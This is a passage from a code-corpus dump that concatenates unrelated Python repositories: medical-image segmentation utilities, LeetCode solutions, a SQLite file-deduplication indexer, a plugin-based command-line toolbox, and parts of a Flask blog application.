    # target pixel = 0 -> weight beta (1.1 x fraction of positive pixels)
weights = alpha * pos + beta * neg
# sigmoid + ce
return F.binary_cross_entropy_with_logits(input, target, weights, reduction=reduction)
class AvgMeter(object):
"""
Acc meter class, use the update to add the current acc
and self.avg to get the avg acc
"""
def __init__(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def poly_lr(epoch, max_epochs, initial_lr, exponent=0.9):
return initial_lr * (1 - epoch / max_epochs)**exponent
def expand_as_one_hot(input, C, ignore_index=None):
"""
Converts NxDxHxW label image to NxCxDxHxW, where each label gets converted to its corresponding one-hot vector
:param input: 4D input image (NxDxHxW)
:param C: number of channels/labels
:param ignore_index: ignore index to be kept during the expansion
:return: 5D output image (NxCxDxHxW)
"""
assert input.dim() == 4
# expand the input tensor to Nx1xDxHxW before scattering
input = input.unsqueeze(1)
# create result tensor shape (NxCxDxHxW)
shape = list(input.size())
shape[1] = C
if ignore_index is not None:
# create ignore_index mask for the result
mask = input.expand(shape) == ignore_index
# clone the src tensor and zero out ignore_index in the input
input = input.clone()
input[input == ignore_index] = 0
# scatter to get the one-hot tensor
result = torch.zeros(shape).to(input.device).scatter_(1, input, 1)
# bring back the ignore_index in the result
result[mask] = ignore_index
return result
else:
# scatter to get the one-hot tensor
return torch.zeros(shape).to(input.device).scatter_(1, input, 1)
def compute_per_channel_dice(input, target, epsilon=1e-6, weight=None):
"""
Computes DiceCoefficient as defined in https://arxiv.org/abs/1606.04797 given a multi channel input and target.
Assumes the input is a normalized probability, e.g. a result of Sigmoid or Softmax function.
Args:
input (torch.Tensor): NxCxSpatial input tensor
target (torch.Tensor): NxCxSpatial target tensor
epsilon (float): prevents division by zero
weight (torch.Tensor): Cx1 tensor of weight per channel/class
"""
# input and target shapes must match
assert input.size() == target.size(), "'input' and 'target' must have the same shape"
# (N, C, D, H, W) -> (C, N * D * H * W)
input = flatten(input)
target = flatten(target)
target = target.float()
# compute per channel Dice Coefficient
intersect = (input * target).sum(-1)
if weight is not None:
intersect = weight * intersect
# here we can use standard dice (input + target).sum(-1) or extension (see V-Net) (input^2 + target^2).sum(-1)
denominator = (input * input).sum(-1) + (target * target).sum(-1)
return 2 * (intersect / denominator.clamp(min=epsilon))
def compute_dsc(predicted_map, target, no_class):
"""average DSC scores across subjects in a batch"""
# to one-hot
predicted_map = expand_as_one_hot(predicted_map.squeeze(1).long(), no_class).cpu().numpy()
target = expand_as_one_hot(target.squeeze(1).long(), no_class).cpu().numpy()
# DSC
organs_dsc = np.zeros((target.shape[0], target.shape[1]-1))
for b in range(target.shape[0]): # batch_size
for i in range(1, no_class):
tmp_dsc = dice(predicted_map[b, i, ...], target[b, i, ...], nan_for_nonexisting=False)
organs_dsc[b, i-1] = tmp_dsc
return np.average(organs_dsc, axis=0)
def flatten(tensor):
"""Flattens a given tensor such that the channel axis is first.
The shapes are transformed as follows:
(N, C, D, H, W) -> (C, N * D * H * W)
"""
# number of channels
C = tensor.size(1)
# new axis order
axis_order = (1, 0) + tuple(range(2, tensor.dim()))
# Transpose: (N, C, D, H, W) -> (C, N, D, H, W)
transposed = tensor.permute(axis_order)
# Flatten: (C, N, D, H, W) -> (C, N * D * H * W)
return transposed.contiguous().view(C, -1)
def get_files_from_txt(txt_files):
"""
:return: [(img_file, lab_file), ...]
"""
with open(txt_files, 'r') as f:
this_files = f.readlines()
files = [(i.rstrip('\n').split(',')[0], i.rstrip('\n').split(',')[1]) for i in this_files]
return files
def do_split(txt_file):
"""save cv fold json"""
files = get_files_from_txt(txt_file)
kf = KFold(n_splits=4, random_state=123, shuffle=True)
train, val = {}, {}
for i, (train_index, val_index) in enumerate(kf.split(files)):
tmp_tr = [files[idx] for idx in train_index]
tmp_val = [files[idx] for idx in val_index]
train[f'fold_{i}'] = tmp_tr
val[f'fold_{i}'] = tmp_val
obj = {'train': train, 'val': val}
with open(txt_file.replace('all_high_resolution.txt', 'cv_high_resolution.json'), 'w') as f:
json.dump(obj, f, indent=4)
def get_fold_from_json(json_file, fold):
"""read json to get training and validation files list"""
with open(json_file, 'r') as f:
a = json.load(f)
return a['train'][f'fold_{fold}'], a['val'][f'fold_{fold}']
def save_volume(case, vol, out_fd):
"""
:param case: files path
:param vol: (np.ndarray) H * W * D
:return:
"""
os.makedirs(out_fd, exist_ok=True)
out_name = '_'.join([case.split('/')[-3], case.split('/')[-1]])
out_name = out_name.replace('img', 'pseg')
affine = nib.load(case).affine
nib_vol = nib.Nifti1Image(vol.astype(np.int32), affine)
nib.save(nib_vol, os.path.join(out_fd, out_name))
def save_edge(case, edge, out_fd):
"""
:param case:
:param edge: (np.ndarray)
:param out_fd:
:return:
"""
os.makedirs(out_fd, exist_ok=True)
out_name = '_'.join([case.split('/')[-3], case.split('/')[-1]])
out_name = out_name.replace('img', 'edge')
out_name_np = out_name.replace('.nii.gz', '.npz')
affine = nib.load(case).affine
edge_lt = (edge * 255.).astype(np.int32)
nib_vol = nib.Nifti1Image(edge_lt, affine)
nib.save(nib_vol, os.path.join(out_fd, out_name))
# np.save(os.path.join(out_fd, out_name_np), edge)
if __name__ == '__main__':
do_split('/data/yzf/dataset/Project/ranet-dataset/all_high_resolution.txt')
```
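As a small illustration of how the helpers above fit together (not part of the repo), `expand_as_one_hot` turns an integer label volume into a one-hot tensor that `compute_per_channel_dice` can consume; the shapes below are arbitrary assumptions.
```python
import torch

no_class = 3
target = torch.randint(0, no_class, (2, 8, 16, 16))      # N x D x H x W integer labels
logits = torch.randn(2, no_class, 8, 16, 16)              # N x C x D x H x W network output
probs = torch.softmax(logits, dim=1)                      # normalized probabilities
target_oh = expand_as_one_hot(target, C=no_class)         # N x C x D x H x W one-hot
per_channel = compute_per_channel_dice(probs, target_oh)  # one Dice value per channel
print(per_channel.shape)  # torch.Size([3])
```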
|
{
"source": "jeff-901/leetcode",
"score": 3
}
|
#### File: leetcode/2073/sol.py
```python
class Solution(object):
def timeRequiredToBuy(self, tickets, k):
"""
:type tickets: List[int]
:type k: int
:rtype: int
"""
ans = 0
require = tickets[k]
for i, ele in enumerate(tickets):
if i == k:
ans += require
elif i < k:
ans += min(tickets[i], require)
else:
ans += min(tickets[i], require - 1)
return ans
```
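A quick worked check of the counting argument: everyone at or before position k pays at most `tickets[k]` passes, everyone after k pays at most `tickets[k] - 1`. The cases below are the standard LeetCode examples (sanity checks, not part of the submission).
```python
sol = Solution()
assert sol.timeRequiredToBuy([2, 3, 2], 2) == 6     # 2 + 2 + 2 seconds
assert sol.timeRequiredToBuy([5, 1, 1, 1], 0) == 8  # 5 + 1 + 1 + 1 seconds
```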
#### File: leetcode/2076/sol.py
```python
class Solution(object):
def friendRequests(self, n, restrictions, requests):
"""
:type n: int
:type restrictions: List[List[int]]
:type requests: List[List[int]]
:rtype: List[bool]
"""
parents = [_ for _ in range(n)]
restrict = [set() for _ in range(n)]
ans = []
def find(node):
if parents[node] != node:
parents[node] = find(parents[node])
return parents[node]
for a, b in restrictions:
restrict[a].add(b)
restrict[b].add(a)
for a, b in requests:
ap = find(a)
bp = find(b)
flag = True
for ele in restrict[ap]:
if find(ele) == bp:
ans.append(False)
flag = False
break
if flag:
for ele in restrict[bp]:
if find(ele) == ap:
ans.append(False)
flag = False
break
if flag:
if ap != bp:
parents[ap] = bp
for ele in restrict[ap]:
restrict[bp].add(ele)
ans.append(True)
return ans
```
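The union-find solution merges the two components only when no restriction links them. A quick check against the standard example (illustrative, not part of the submission):
```python
# n = 3, persons 0 and 1 may never be connected: the second request would join them via 2.
assert Solution().friendRequests(3, [[0, 1]], [[0, 2], [2, 1]]) == [True, False]
```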
|
{
"source": "jeff-99/hashdex",
"score": 3
}
|
#### File: hashdex/hashdex/files.py
```python
import os
from collections import namedtuple
File = namedtuple('File', ['full_path', 'filename'])
class DirectoryScanner(object):
def __init__(self, basepath):
self.basepath = basepath
def _fetch_files(self, dir):
file_list = []
for root, subdirs, files in os.walk(dir):
for file in files:
file_list.append(File(os.path.join(root, file), file))
return file_list
def get_files(self):
if os.path.isfile(self.basepath):
real_path = os.path.realpath(os.path.expanduser(self.basepath))
return [File(real_path, os.path.basename(real_path))]
return self._fetch_files(self.basepath)
class DuplicateFileResult(object):
def __init__(self):
self.dupes = []
self.diffs = []
def add_duplicate(self, filepath):
self.dupes.append(filepath)
def get_files(self):
return self.dupes + self.diffs
def add_diff(self, filepath):
self.diffs.append(filepath)
def is_equal(self):
return len(self.dupes) > 0 and len(self.diffs) == 0
def __eq__(self, other):
return set(self.dupes) == set(other.dupes) and \
set(self.diffs) == set(other.diffs)
```
#### File: hashdex/hashdex/indexer.py
```python
import math
import os
import sqlite3
import filecmp
from hashlib import sha1, md5
from hashdex.files import DuplicateFileResult
from .files import File
def create_connection(db):
if db == ':memory:':
connection_string = db
else:
connection_string = os.path.expanduser(db)
dirname = os.path.dirname(connection_string)
if not os.path.exists(dirname):
os.makedirs(dirname)
return sqlite3.connect(connection_string)
class Hasher(object):
BYTE_COUNT = int(10e5) # 1MB
def get_hashes(self, file):
filesize = os.stat(file.full_path).st_size
with open(file.full_path, 'rb') as f:
content = b""
if filesize < self.BYTE_COUNT:
content += f.read(filesize)
else:
part_count = int(math.floor(self.BYTE_COUNT / 2))
content += f.read(part_count)
                f.seek(-part_count, os.SEEK_END)  # jump back to the last part_count bytes
content += f.read(part_count)
sha_hash = sha1(content).hexdigest()
md5_hash = md5(content).hexdigest()
return (sha_hash, md5_hash)
class Indexer(object):
def __init__(self, connection, hasher):
self.connection = connection
self.hasher = hasher
def build_db(self, ):
self.connection.execute("""
CREATE TABLE hashes (
hash_id INTEGER PRIMARY KEY AUTOINCREMENT,
sha1_hash TEXT,
md5_hash TEXT
)
""")
self.connection.execute("CREATE UNIQUE INDEX idx_hashes ON hashes ( sha1_hash , md5_hash )")
self.connection.execute("""
CREATE TABLE files (
hash_id INTEGER,
full_path TEXT,
filename TEXT,
FOREIGN KEY(hash_id) REFERENCES hashes(hash_id)
)
""")
self.connection.execute("CREATE UNIQUE INDEX idx_paths ON files ( full_path )")
def _check_index(self, sha1_hash, md5_hash):
return self.connection.execute("SELECT hash_id FROM hashes WHERE sha1_hash = ? AND md5_hash = ? ",
[sha1_hash, md5_hash]).fetchone()
def add_file(self, file):
sha_hash, md5_hash = self.hasher.get_hashes(file)
cursor = self.connection.cursor()
try:
cursor.execute("INSERT OR IGNORE INTO hashes (sha1_hash, md5_hash) VALUES (?,?)", (sha_hash, md5_hash))
hash_id = self._check_index(sha_hash, md5_hash)[0]
cursor.execute(
"INSERT OR IGNORE INTO files (hash_id, full_path, filename) VALUES (?,?,?)",
(hash_id, file.full_path, file.filename)
)
self.connection.commit()
except sqlite3.Error as e:
print(e)
self.connection.rollback()
def in_index(self, file):
sha_hash, md5_hash = self.hasher.get_hashes(file)
return self._check_index(sha_hash, md5_hash) is not None
def fetch_indexed_file(self, file):
sha_hash, md5_hash = self.hasher.get_hashes(file)
data = self.connection.cursor().execute("""
SELECT full_path, filename
FROM files f
JOIN hashes h ON h.hash_id = f.hash_id
WHERE h.sha1_hash = ? AND h.md5_hash = ?
""", (sha_hash, md5_hash)).fetchone()
if data is None:
return None
return File(data[0], data[1])
def get_index_count(self):
return self.connection.cursor().execute("SELECT COUNT(*) FROM hashes").fetchone()[0]
def get_duplicates(self):
cursor = self.connection.cursor()
dupes = cursor.execute("""
SELECT GROUP_CONCAT(full_path , '|') FROM files f
JOIN hashes h ON h.hash_id = f.hash_id
GROUP BY h.hash_id
HAVING COUNT(h.hash_id) > 1
""").fetchall()
for (dupe,) in dupes:
real_dupes = dupe.split("|")
result = DuplicateFileResult()
first = real_dupes[0]
result.add_duplicate(first)
for next in real_dupes[1:]:
same = filecmp.cmp(first, next)
if not same:
result.add_diff(next)
else:
result.add_duplicate(next)
yield result
def get_files(self):
cursor = self.connection.cursor()
cursor = cursor.execute("SELECT full_path, filename FROM files")
while True:
results = cursor.fetchmany(1000)
            if not results:  # fetchmany returns an empty list once the cursor is exhausted
break
for result in results:
yield File(result[0], result[1])
def delete(self, file):
cursor = self.connection.cursor()
try:
cursor.execute("DELETE FROM files WHERE full_path = ?", (file.full_path, ))
cursor.execute("""
DELETE FROM hashes WHERE hash_id IN (
SELECT hash_id
FROM hashes h
LEFT JOIN files f ON h.hash_id = f.hash_id
                    WHERE f.full_path IS NULL
)
""")
return True
except sqlite3.Error:
return False
```
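A minimal end-to-end sketch of the pieces above (not part of the package docs): scan a directory, index every file in an in-memory database, then report duplicate groups. The directory path is a placeholder.
```python
from hashdex.files import DirectoryScanner
from hashdex.indexer import create_connection, Hasher, Indexer

connection = create_connection(':memory:')   # throwaway SQLite database
indexer = Indexer(connection, Hasher())
indexer.build_db()
for f in DirectoryScanner('/path/to/photos').get_files():
    indexer.add_file(f)
print(indexer.get_index_count())
for result in indexer.get_duplicates():
    if result.is_equal():                     # byte-identical duplicates only
        print(result.get_files())
```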
|
{
"source": "jeff-99/toolbox",
"score": 2
}
|
#### File: toolbox/tests/plugin_module.py
```python
__author__ = 'jeff'
import toolbox.plugin
class TestPlugin(toolbox.plugin.ToolboxPlugin):
name = 'test'
description = 'test'
def prepare_parser(self, parser):
pass
def execute(self, args):
pass
```
#### File: toolbox/tests/test_scanner.py
```python
import unittest
from toolbox.scanner import find_modules, find_contrib_modules, find_local_modules
import os
CONTRIB_MODULES = sorted(['checksum', 'config', 'create', 'install', 'list', 'logs'])
CONTRIB_MODULES_IMPORT = ["toolbox.contrib.{}".format(i) for i in CONTRIB_MODULES]
class TestScanner(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_find_contrib_modules(self):
modules = find_contrib_modules()
self.assertEqual(sorted(modules), CONTRIB_MODULES_IMPORT)
def test_find_local_modules(self):
import toolbox.contrib
module_dir = os.path.dirname(toolbox.contrib.__file__)
modules = find_local_modules(module_dir)
self.assertEqual(sorted(modules), CONTRIB_MODULES)
```
#### File: toolbox/toolbox/cli.py
```python
import sys
from toolbox.core import Toolbox
def main():
toolbox = Toolbox()
toolbox(sys.argv[1:])
if __name__ == '__main__':
main()
```
#### File: contrib/create/parser.py
```python
__author__ = 'jeff'
import os
import re
from .renderer import ALIASES
class Parser(object):
def __init__(self, template_dir, dest_dir, args):
self.template_dir = template_dir
self.dest_dir = dest_dir
self.args = args
def resolve_key(self, match):
"""
        Resolve the matched key and process its value based on the supplied renderer
:param match:
:return:
:rtype: str
"""
args = match.group(1).split('|')
key = args[0]
processor_funcs = args[1:]
value = self.args.get(key, '')
for func_name in processor_funcs:
# get renderer func or use to string func
value = ALIASES.get(func_name, str)(value)
return value
def _parse_line(self, line):
"""
        Finds template variable names in the provided line and calls the resolve_key method for each match.
        Each match is replaced with its resolved value and the resulting line is returned.
:param line:
:return:
"""
pattern = r'{{(.*?)}}'
line = re.sub(pattern, self.resolve_key, line)
return line
def _parse_path(self, path):
return self._parse_line(path)
def _parse_file(self, fp):
new_data = []
with open(fp, 'r') as f:
data = f.readlines()
for line in data:
new_data.append(self._parse_line(line))
return "".join(new_data)
def parse(self):
"""
        Walk the template dir, read the template files and parse them, replacing variables in the files with
        values given in the args dictionary.
        Return a list of (destination path, file names, file contents) tuples, mirroring the structure of os.walk.
:return:
"""
dir_content = []
for cur_path, dirs, files in os.walk(self.template_dir):
new_path = cur_path.replace(self.template_dir, self.dest_dir)
path = self._parse_path(new_path)
file_paths = [self._parse_path(fp) for fp in files]
file_contents = [self._parse_file(os.path.join(cur_path, fp))
for fp in files]
dir_content.append((path, file_paths, file_contents))
return dir_content
```
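To make the `{{key|renderer}}` syntax handled by `resolve_key` concrete, here is a small sketch (not part of the package) that calls the internal `_parse_line` helper directly; the directory arguments are dummy values because only line parsing is exercised.
```python
parser = Parser(template_dir='/tmp/tpl', dest_dir='/tmp/out',
                args={'name': 'mytool', 'deps': 'requests click'})
print(parser._parse_line('class {{name|c}}Plugin:'))
# -> class MytoolPlugin:
print(parser._parse_line('DEPENDENCIES = {{deps|pylist}}'))
# -> DEPENDENCIES = ["requests","click"]
```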
#### File: contrib/create/renderer.py
```python
import os
def capitalize(string):
return string.capitalize()
def pylist(param):
"""
    Takes a space-separated string (or a list of strings) and renders Python list source code
:param param:
:return:
"""
prefix = '["'
suffix = '"]'
if isinstance(param, str):
param = param.split(' ')
if isinstance(param, list):
param = '","'.join(param)
return prefix + param + suffix
def path(string):
return os.path.abspath(string)
ALIASES = {'c': capitalize, 'path': path, 'pylist': pylist}
```
#### File: contrib/list/list.py
```python
__author__ = 'jeff'
from toolbox.plugin import ToolboxPlugin
from toolbox.mixins import RegistryMixin
from toolbox.scanner import find_modules
from terminaltables import AsciiTable
class ListPlugin(RegistryMixin, ToolboxPlugin):
name = 'list'
description = 'List all plugins'
def prepare_parser(self, parser):
parser.add_argument('-e',
'--external',
action='store_true',
help='only external plugins')
parser.add_argument('search', nargs="?", help="search query")
def execute(self, args):
registry = self.get_registry()
data = []
if args.external:
for name in find_modules():
if args.search is None or (args.search is not None and
self.search_match(args.search,
name)):
data.append([name, ''])
else:
for plugin in registry.get_plugins():
if args.search is None or (
args.search is not None and self.search_match(
args.search, plugin.name + plugin.description)):
data.append([plugin.name, plugin.description])
self.display_plugins(data)
def search_match(self, query, string):
return query in string
def display_plugins(self, data):
data.sort(key=lambda row: row[0])
data.insert(0, ['Plugin', 'Description'])
table = AsciiTable(data)
table.padding_left = 3
table.padding_right = 3
print(table.table)
```
#### File: contrib/logs/logs.py
```python
from toolbox.plugin import ToolboxPlugin
from toolbox.defaults import TOOLBOX_DIR
import os, re
class LogsPlugin(ToolboxPlugin):
name = 'logs'
description = 'view logs'
def prepare_parser(self, parser):
parser.add_argument('pluginlog', nargs="?", help="filter for plugin")
def execute(self, args):
with open(os.path.join(TOOLBOX_DIR, 'toolbox.log'), 'r') as f:
for line in f.readlines():
if args.pluginlog is not None:
pattern = 'toolbox.plugins.{}'.format(args.pluginlog)
match = re.search(re.escape(pattern), line, re.IGNORECASE)
if not match is None:
print(line.rstrip('\n'))
else:
print(line.rstrip('\n'))
```
#### File: toolbox/toolbox/core.py
```python
import argparse, logging, os
from logging.handlers import TimedRotatingFileHandler
from logging import Formatter
from .defaults import TOOLBOX_DIR
from .registry import Registry, NoPluginException
from .scanner import find_contrib_modules, find_modules, find_local_modules
class UnknownPlugin(Exception):
pass
class Toolbox(object):
"""
Initialize the toolbox, sets up the main argument parser and Tool registry
Core tools in de contrib package are always loaded
The local and external flags can be used to limit the loaded modules
:param bool external:
:param bool local:
:return:
"""
def __init__(self, external=True, local=True):
# load core plugins
modules = find_contrib_modules()
self.registry = Registry()
self.registry.populate(modules)
self.parser = argparse.ArgumentParser()
global_config = self.registry.get_plugin('config')
if len(global_config.get_config()) == 0:
global_config.set_defaults()
self._init_logger(debug=global_config.get('debug'))
extra_modules = []
if external:
extra_modules += find_modules(global_config.get('toolbox_prefix'))
extra_modules += global_config.get('external_plugins') or []
if local:
extra_modules += find_local_modules(global_config.get(
'local_plugin_dir'))
try:
self.registry.populate(extra_modules)
except (AttributeError, NoPluginException) as e:
print(
"An external Plugin caused trouble, please uninstall it -- {}".format(
e))
def _init_logger(self, debug):
"""
Initialise the main logger
:param debug:
:return:
"""
logger = logging.getLogger('toolbox')
handler = TimedRotatingFileHandler(
os.path.join(TOOLBOX_DIR, 'toolbox.log'), when='H', interval=1, encoding='utf-8', backupCount=1)
formatter = Formatter(
fmt="%(asctime)s %(name)-12s %(levelname)-8s %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.WARNING)
if debug is True:
logger.setLevel(logging.DEBUG)
def prepare(self):
"""
Prepares the main Argument parser by loading all registered plugins and setting their executable
:return:
"""
# prepare main parser
self.parser.usage = '%(prog)s tool [args]'
self.parser.description = 'Extendable plugin toolbox'
self.parser.add_argument('-v',
'--version',
help="Toolbox version",
action='store_true')
# prepare subparsers
subparsers = self.parser.add_subparsers(help='Plugins', dest='plugin')
for plugin in self.registry.get_plugins():
# create a new subparser for this plugin
plugin_parser = subparsers.add_parser(plugin.name)
# set the default execute method as plugin executable
plugin_parser.set_defaults(executable=plugin.execute)
# let the plugin prepare the arguments
plugin.prepare_parser(plugin_parser)
def execute(self, args):
"""
This is the Toolbox's main function which parses the arguments, which should yield:
- a Tool
- an Executable
- and some optional arguments
The Tool gets fetched from the registry where it will be fully loaded
and the exectuble is executed with the remaining args
:param args: List of arguments
:type args: list
:return:
"""
parsed_args = self.parser.parse_args(args)
if parsed_args.version:
import toolbox
print(toolbox.__version__)
exit()
if parsed_args.plugin is None:
self.parser.print_help()
raise UnknownPlugin('Plugin not set')
else:
# triggers the lazy loading of the selected plugin
self.registry.get_plugin(parsed_args.plugin)
try:
parsed_args.executable(parsed_args)
except Exception as e:
print("Somehow the plugin did not do what it should have done!")
print(e)
def shutdown(self):
"""
Shuts down the application, save and close config files etc.
:return:
"""
self.registry.shutdown()
def __call__(self, args):
"""
Run the Toolbox with the supplied arguments.
This method is primarily used by the commandline script
:param args:
:return:
"""
self.prepare()
try:
self.execute(args)
except UnknownPlugin:
return
self.shutdown()
```
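For reference, a minimal sketch (not from the repo) of driving `Toolbox` directly with an argument list, mirroring what `toolbox/cli.py` does with `sys.argv[1:]`; it assumes the bundled `config` plugin can supply its defaults on first run.
```python
from toolbox.core import Toolbox

toolbox = Toolbox(external=False, local=False)  # load only the bundled contrib plugins
toolbox(['list'])  # prepare the parsers, run the contrib "list" plugin, then shut down
```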
|
{
"source": "Jeffacy99/Blog",
"score": 3
}
|
#### File: Blog/App/assertion.py
```python
import re
from functools import wraps
from flask import abort as flask_abort
from flask import request
from flask_maple.response import HTTP
def assert_request(assertion, include=[], exclude=[]):
def _assert_request(func):
@wraps(func)
def decorator(*args, **kwargs):
data = request.data
resp = assertion(data, include, exclude)()
if resp is not None:
return resp
return func(*args, **kwargs)
return decorator
return _assert_request
class Assert(object):
def __init__(self, data=dict(), include=[], exclude=[], abort=None):
self.data = data
self.asserts = {
i.split("_", 2)[1]: [i]
for i in dir(self) if i.startswith('assert_')
}
self._include = include
self._exclude = exclude
self._abort = abort
def abort(self, key, value, message):
if self._abort is not None:
if callable(self._abort):
return self._abort(key, value, message)
return self._abort
if not message:
message = "{0} params error".format(key)
return flask_abort(HTTP.BAD_REQUEST(message=message))
def add(self, key, assertion, *args, **kwargs):
# assertion.add("username", "assertRequire")
# assertion.add("password", "assertRequire", "密码不能为空")
# assertion.add("password", "assertLength", 5, 20)
assert hasattr(self, assertion)
def _assert(value):
assert getattr(self, assertion)(value, *args, **kwargs)
self.asserts.setdefault(key, [])
self.asserts[key].append(_assert)
def assertOr(self, funcs=[], msg=None):
raise_errors = []
for func in funcs:
try:
func()
except AssertionError as e:
raise_errors.append(e)
if funcs and len(raise_errors) == len(funcs):
if msg is None:
raise raise_errors[0]
raise AssertionError(msg) from raise_errors[0]
def assertAnd(self, funcs=[], msg=None):
for func in funcs:
try:
func()
except AssertionError as e:
if msg is None:
raise
raise AssertionError(msg) from e
def assertRequire(self, key, msg=None):
if not msg:
msg = "{0} is null".format(key)
if not bool(key):
raise AssertionError(msg)
def assertIn(self, key, value, msg=None):
if not msg:
msg = "{0} not in {1}".format(key, value)
if key not in value:
raise AssertionError(msg)
def assertType(self, key, value, msg=None):
if not msg:
msg = "{0}'s type is not {1}".format(key, value)
if not isinstance(key, value):
raise AssertionError(msg)
def assertEqual(self, key, value, ignore_case=False, msg=None):
if ignore_case:
key, value = key.lower(), value.lower()
if not msg:
msg = "{0} should be equal to {1}".format(key, value)
        if key != value:
raise AssertionError(msg)
def assertLength(self, key, min_length=0, max_length=0, msg=None):
if not msg and min_length == max_length:
msg = "{0}'s length should be equal to {1}".format(key, min_length)
elif not msg and min_length == 0:
msg = "{0}'s length should be less than {1}".format(
key, max_length)
elif not msg and max_length == 0:
msg = "{0}'s length should be greater than {1}".format(
key, min_length)
elif not msg:
msg = "{0}'s length should be between with {1} to {2}".format(
key, min_length, max_length)
if key is None:
key = ""
length = len(key)
if length < min_length or (max_length > 0 and length > max_length):
raise AssertionError(msg)
def assertURL(self, value, msg=None):
if not msg:
msg = "{0} is not effective url".format(value)
key = r'^[a-z]+://(?P<host>[^/:]+)(?P<port>:[0-9]+)?(?P<path>\/.*)?$'
self.assertRegex(value, key, msg)
def assertEmail(self, value, msg=None):
if not msg:
msg = "{0} is not effective email".format(value)
key = r'^\<KEY>'
self.assertRegex(value, key, msg)
def assertRegex(self, key, value, msg=None):
if not msg:
msg = "{0} can't match with {1}".format(value, key)
if not re.match(value, key):
raise AssertionError(msg)
def __call__(self):
for key, funcs in self.asserts.items():
if self._include and key not in self._include:
continue
if self._exclude and key in self._exclude:
continue
value = self.data.get(key)
for func in funcs:
if isinstance(func, str):
func = getattr(self, func)
try:
func(value)
except AssertionError as e:
return self.abort(key, value, e)
# if __name__ == '__main__':
# class UserAssert(Assert):
# def assert_username(self, value):
#             self.assertRequire(value, "username cannot be empty")
#             self.assertLength(value, 4, 20, "username length must be at least 5")
#         def assert_password(self, value):
#             self.assertRequire(value, "password cannot be empty")
#             self.assertLength(value, 5, 20, "password length must be at least 5")
#             funcs = [
#                 lambda: self.assertRequire(value, "password cannot be empty"),
#                 lambda: self.assertLength(value, 5, 20, "password length must be at least 5")
#             ]
#             self.assertOr(funcs, "username error")
#             self.assertAnd(funcs, "username error 1")
# assertion = UserAssert({"username": "username", "password": "<PASSWORD>"})()
```
#### File: App/extension/login.py
```python
from flask_login import LoginManager, login_user
from flask_babel import lazy_gettext as _
from flask_maple.response import HTTP
login_manager = LoginManager()
@login_manager.user_loader
def user_loader(id):
from maple.model import User
return User.query.get(int(id))
@login_manager.request_loader
def request_loader(request):
from maple.model import User
token = request.headers.get('Maple-Token', request.args.get('maple_token'))
user = None
if token:
user = User.check_token(token)
if not user:
return
user.login(True)
return user
@login_manager.unauthorized_handler
def unauthorized_handler():
return HTTP.UNAUTHORIZED()
def init_app(app):
# login_manager.login_view = "auth.login"
login_manager.session_protection = "basic"
login_manager.login_message = _("Please login to access this page.")
login_manager.init_app(app)
```
#### File: App/extension/maple.py
```python
from flask_maple.bootstrap import Bootstrap
from flask_maple.captcha import Captcha
from flask_maple.error import Error
from flask_maple.app import App
from flask_maple.json import CustomJSONEncoder
from flask_maple.middleware import Middleware
from flask_maple.log import Logging
def init_app(app):
Bootstrap(
app,
css=(
'css/base.css', 'css/main.css', 'css/monokai.css', 'css/lib.css',
'css/timeline.css', 'css/night.css'),
js=('js/main.js', 'js/highlight.js', 'js/night.js'),
auth=False)
Captcha(app)
Error(app)
App(app, json=CustomJSONEncoder)
Middleware(app)
Logging(app)
```
#### File: Blog/App/__init__.py
```python
from flask import Flask
from maple import extension, router, jinja, admin, alias, api
from werkzeug import import_string
import os
def create_app(config):
templates = os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir, 'templates'))
static = os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir, 'static'))
app = Flask(__name__, template_folder=templates, static_folder=static)
app.config.from_object(config)
app.url_map.redirect_defaults = False
extension.init_app(app)
jinja.init_app(app)
admin.init_app(app)
router.init_app(app)
api.init_app(app)
alias.init_app(app)
apps = ["maple.blog", "maple.storage", "maple.tool"]
[import_string(i).init_app(app) for i in apps]
return app
```
#### File: App/storage/db.py
```python
import os
from flask_maple.models import ModelTimeMixin, ModelUserMixin
from flask import url_for
from maple.extension import db
from sqlalchemy import event
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm.attributes import get_history
from werkzeug.utils import secure_filename
from . import config
class Bucket(ModelUserMixin, db.Model):
__tablename__ = 'bucket'
name = db.Column(db.String(108), nullable=False, unique=True)
description = db.Column(db.String(1024), default='default')
def get_root_path(self, path, create=False):
filepath = self.rootpath
for name in path.split("/"):
if name == "":
continue
childpath = filepath.child_paths.filter_by(
name=name,
bucket_id=self.id,
).first()
if not childpath and not create:
return
if not childpath and create:
childpath = FilePath(
name=name,
bucket_id=self.id,
parent_id=filepath.id,
)
childpath.save()
filepath = childpath
return filepath
@property
def rootpath(self):
filepath = self.paths.filter_by(name="/").first()
if not filepath:
filepath = FilePath(name="/", bucket_id=self.id)
filepath.save()
return filepath
@property
def abspath(self):
return os.path.join(config.UPLOAD_FOLDER, self.name)
@property
def relpath(self):
return os.path.join(self.name)
def __repr__(self):
return '<Bucket %r>' % self.name
def __str__(self):
return self.name
class FilePath(ModelTimeMixin, db.Model):
__tablename__ = 'filepath'
name = db.Column(db.String(108), nullable=False, default="/")
bucket_id = db.Column(
db.Integer,
db.ForeignKey('bucket.id', ondelete="CASCADE"),
nullable=False)
bucket = db.relationship(
Bucket,
backref=db.backref(
'paths',
cascade='all,delete-orphan',
lazy='dynamic',
),
lazy='joined',
uselist=False)
parent_id = db.Column(
db.Integer,
db.ForeignKey('filepath.id', ondelete="CASCADE"),
)
@property
def size(self):
size = sum(
[
i[0] for i in db.session.query(File.size).filter_by(
path_id=self.id)
])
return size + sum([i.size for i in self.child_paths])
@declared_attr
def parent_path(cls):
return db.relationship(
'FilePath',
remote_side=[cls.id],
backref=db.backref(
'child_paths',
remote_side=[cls.parent_id],
cascade='all,delete-orphan',
lazy='dynamic'),
lazy='joined',
uselist=False)
@property
def abspath(self):
if self.is_root_path:
return self.bucket.abspath
return os.path.join(
self.parent_path.abspath,
self.name,
)
@property
def relpath(self):
if self.is_root_path:
return self.bucket.relpath
return os.path.join(
self.parent_path.relpath,
self.name,
)
@property
def fullname(self):
if self.is_root_path:
return "/"
return os.path.join(
self.parent_path.fullname,
self.name,
)
@property
def is_root_path(self):
return self.name == "/" and not self.parent_id
@property
